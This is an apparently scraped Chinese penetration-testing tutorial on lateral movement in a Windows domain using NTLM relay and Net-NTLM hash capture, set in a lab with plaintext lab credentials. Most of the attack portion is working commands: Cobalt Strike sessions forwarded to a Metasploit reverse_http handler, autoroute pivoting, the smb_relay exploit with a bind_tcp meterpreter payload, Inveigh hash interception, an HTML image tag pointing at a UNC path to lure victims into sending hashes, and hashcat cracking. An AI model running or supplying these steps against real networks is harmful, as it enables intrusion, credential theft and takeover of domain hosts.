合肥网站运营,网页版梦幻西游五行斗法,在线网站建设培训班,网络营销工具中目录
NTLM认证过程以及攻击面
NTLM Relay攻击
NTLM攻击总结
实验环境说明
域横向移动#xff1a;NTLM中继攻击
攻击条件
实战一#xff1a;NTLM中继攻击-CS转发上线MSF
原理示意图
一. CS代理转发
二. MSF架设路由
三. 适用smb_relay模块进行中继攻击
域横向移动…目录
NTLM认证过程以及攻击面
NTLM Relay攻击
NTLM攻击总结
实验环境说明
域横向移动NTLM中继攻击
攻击条件
实战一NTLM中继攻击-CS转发上线MSF
原理示意图
一. CS代理转发
二. MSF架设路由
三. 适用smb_relay模块进行中继攻击
域横向移动Net NTLM Hash劫持破解
一. 监听拦截
二. 触发拦截
三. 破解密钥
补充这种方式不仅可以适用smb协议还可以走其他的 NTLM认证过程以及攻击面
非域中
当客户端需要访问服务器时客户端需要输入服务器的用户名和密码进行验证并且客户端会将服务器的NTLM-Hash值缓存。之后客户端开始向服务器发送 TYPE 1 Negotiate 协商消息。服务器收到客户端发送来的 TYPE 1 协商消息后会取出其中自己能够接受的内容传入NTLM SSP得到 TYPE 2 挑战消息此 TYPE 2消息中包含了一个由服务端生成的16位随机值被称为 Challenge。服务器将此challenge保存一份后将TYPE 2消息发送回客户端。客户端收到服务器发来的TYPE 2消息后读出其中的challenge值用缓存的服务端密码的NTLM-Hash对其进行加密并与用户名、challenge等一起组合得到 Net-NTLMHash 最后将 Net-NTLMHash 封装到 TYPE 3 NTLM_AUTH消息中发往服务器。服务器在收到 TYPE 3 的消息之后用自己密码的 NTLM-Hash 对 Challenge 进行加密并比较自己计算出的 Net NTLM-Hash 认证消息和客户端发送的认证消息是否匹配。如果匹配则证明客户端掌握了正确的密码认证成功否则认证失败。
域中在第4步有所不同如果是在域环境中那么认证过程会经过域控制器
当客户端需要访问服务器时客户端需要输入服务器的用户名和密码进行验证并且客户端会将服务器的NTLM-Hash值缓存。之后客户端开始向服务器发送 TYPE 1 Negotiate 协商消息。服务器收到客户端发送来的 TYPE 1 协商消息后会取出其中自己能够接受的内容传入NTLM SSP得到 TYPE 2 挑战消息此 TYPE 2消息中包含了一个由服务端生成的16位随机值被称为 Challenge。服务器将此challenge保存一份后将TYPE 2消息发送回客户端。客户端收到服务器发来的TYPE 2消息后读出其中的challenge值用缓存的服务端密码的NTLM-Hash对其进行加密并与用户名、challenge等一起组合得到 Net-NTLMHash 最后将 Net-NTLMHash 封装到 TYPE 3 NTLM_AUTH消息中发往服务器。服务器接收到客户端发送来的 TYPE 3 消息后取出其中的Net NTLM-Hash值并向域控制器发送针对客户端的验证请求。该请求的内容包含用户名、原始的 Challenge 和 加密后的Challenge(也就是Net NTLM-Hash)。DC根据用户名取出该帐号的密码哈希值 NTLM-Hash用密码哈希值 NTLM-Hash 对原始的Challenge进行加密得到Net NTLM-Hash。如果加密后的Challenge和服务器发送的一致则意味着用户拥有正确的密码验证通过否则验证失败。DC将验证结果发给服务器。 针对NTLM Hash的攻击PTH信息收集针对Net NTLM Hash的攻击暴力破解明文密码利用Net-NTLM Hash中继攻击
Pass The Hash哈希传递攻击通过抓取主机上的Hash传递他们进行攻击不需要明文密码。
利用NTLM进行信息收集通过CS命令就可以达到目的没有意义。
Net-NTLM Hash破解暴力破解得到明文密码
NTLM Relay利用Net-NTLM Hash进行中继攻击
PTH的攻击条件需要NTLM-Hash而后两种则是通过Net-NTLM Hash进行攻击的
如果计算机的修改过注册表打过补丁都有可能造成明文密码Hash提取不到。我们可以尝试获得Net NTLM Hash进行攻击利用。 NTLM Relay攻击
这种攻击方式可以应用在获取不到明文或HASH时采用的手法但也要注意手法的必备条件。
Relay攻击要涉及到NTLM认证和Net-NTLM Hash
NTLM HashNTLM hash 就是里面加密保存了用户密码的 hash。Windows 中的用户密码被系统加密后保存在 SAM 文件中如果是域环境则保存在域控的 NTDS.dit 中。
Net NTLM HashNet-NTLM Hash 是基于用户密码的NTLM Hash计算出来的用于在网络环境下 NTLM 认证的 hash。客户端在请求服务时需要的NTLM Hash是服务端密码Net NTLM Hash的生成需要服务端密码的NTLM Hash和challenge用户名得到的。 NTLM攻击总结
有NTLM Hash直接PTH没有NTLM Hash尝试抓取Net NTLM Hash暴力破解明文密码中继攻击。 实验环境说明
DC192.168.3.21 本地管理员administrator Admin12345 域账户god/administrator Admin12345
SQLserver192.168.3.32 本地管理员administrator admin!#45 域账户god/dbadmin admin!#45
Mary-PC192.168.3.25 本地管理员administrator admin!#45 域账户god/mary admin!#45
webserver192.168.3.31 192.168.46.128出网 本地管理员administrator admin!#45 域账户god/webadmin admin!#45
Kali架设MSF 192.168.46.166
46网段是出网的3网段是内网。 域横向移动NTLM中继攻击
一句换概括拿已控制主机的本地管理员的NTLM Hash进行赌狗行为碰撞别的主机进行登录。
一般不会拿域账户的NTLM Hash因为没有意义权限太低。
攻击条件
在内网一台计算机上执行下面这条命令会发生什么事情此时该主机是管理员登录
dir \\192.168.3.21\c$
dir \\192.168.3.32\c$
这时通过SMB协议访问对方主机的C盘这是一个访问对方主机服务的过程是需要NTLM验证的这里这台主机实际上并没有192.168.3.21的NTLM Hash或者密码的在内存中会加载已有的NTLM Hash也就是自己的(该命令会默认拿自己的)用这一套NTLM Hash去做NTLM认证。
一般来说是会失败的但是这里却成功了。访问192.168.3.32失败下面的却成功了。 也就是说该计算机的NTLM Hash和192.168.3.32主机的NTLM Hash是一样的。
这个Net NTLM Hash中继攻击本质就是利用自己计算机的NTLM Hash或者说账号密码进行碰撞因为这台机器虽然我们拿到了权限但是NTLM Hash窃取不到尝试通过这种赌博行为攻击其它主机。
在实验环境中用webserver这台主机的管理员账号密码是可以配置所有主机并成功的。 实战一NTLM中继攻击-CS转发上线MSF
首先是获得了一台主机webserver的权限 原理示意图 CS做权限移交利用MSF进行渗透CS上每次功能
MSF做一个转发工作配置转发对象
攻击原理用已经拿下权限的主机利用administrator权限去比对任意域内主机比对成功就可以访问登录对方主机就可以直接上线MSF拿到对象的administrator权限 一. CS代理转发
转发到内网的一台Kali上上面架设有MSF实际环境也可转发外网。
配置监听器CS流量转发MSF 192.168.46.166出网2222端口 转发这个监听器
spawn l-msf二. MSF架设路由
MSF监听上线
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 2222
run添加路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
backgroup //返回MSF可以攻击到内网3网段 三. 适用smb_relay模块进行中继攻击
设置攻击目标为192.168.3.32
重发模块
use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32 //转发攻击目标
set lhost 192.168.46.166 //设置本地IP
set autorunscript post/windows/manage/migrate建立正向连接
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32 //设置连接目标
run这里是一个system权限我们需要的administrator权限降权
CS降权
查看进程 记录下pid通过system进行令牌窃取权限降为administrator MSF降权
get uid
ps 在CS上执行命令
shell dir \\192.168.46.166\c$ 这条命令会被MSF中继模块再次进行转发相当于是192.168.3.31对192.168.3.32发起请求
dir \\192.168.3.32\c$
也可以在MSF上执行Meterpreter上输出shell,弹出192.168.3.31的cmd 攻击成功192.168.3.32上线MSF 192.168.3.32上线MSF因为采用的是正向连接也就是192.168.3.31正向连接192.168.3.32 上线 域横向移动Net NTLM Hash劫持破解
条件被控主机当前管理员权限
因为下面是利用工具所以需要足够的运行权限
项目地址https://github.com/Kevin-Robertson/Inveigh
这里是诱导域内主机访问我们这台已经拿下权限的主机192.168.3.31对方会把自己的Hash发给我们直接拦截下来Net NTLM Hash被捕捉只要是访问192.168.3.31就会被拿下Hash这Hash可能是域控的本地管理员的域用户的 一. 监听拦截
上传程序到对方主机或者挂代理不推荐程序本身就不大避免数据丢失
工具放在192.168.3.31被控主机上执行
Inveigh.exe获取到的是NET NTLM HASH V1或V2 二. 触发拦截
令别的主机dir webserver这里是拿域控的主机进行演示
dir \\192.168.3.31\c$拦截到Hash 会保存在当前目录
这个一般是要配合钓鱼和前面的Exchange服务利用进行结合
!DOCTYPE html
html
headtitle/title
/head
bodyimg srcfile:///\\192.168.3.32\2
/body
/html三. 破解密钥
破解域控的Hash得到域控的明文密码
hashcat -m 5600 hash pass.txt --show得到域控用户的Hash明文 Admin12345 补充这种方式不仅可以适用smb协议还可以走其他的
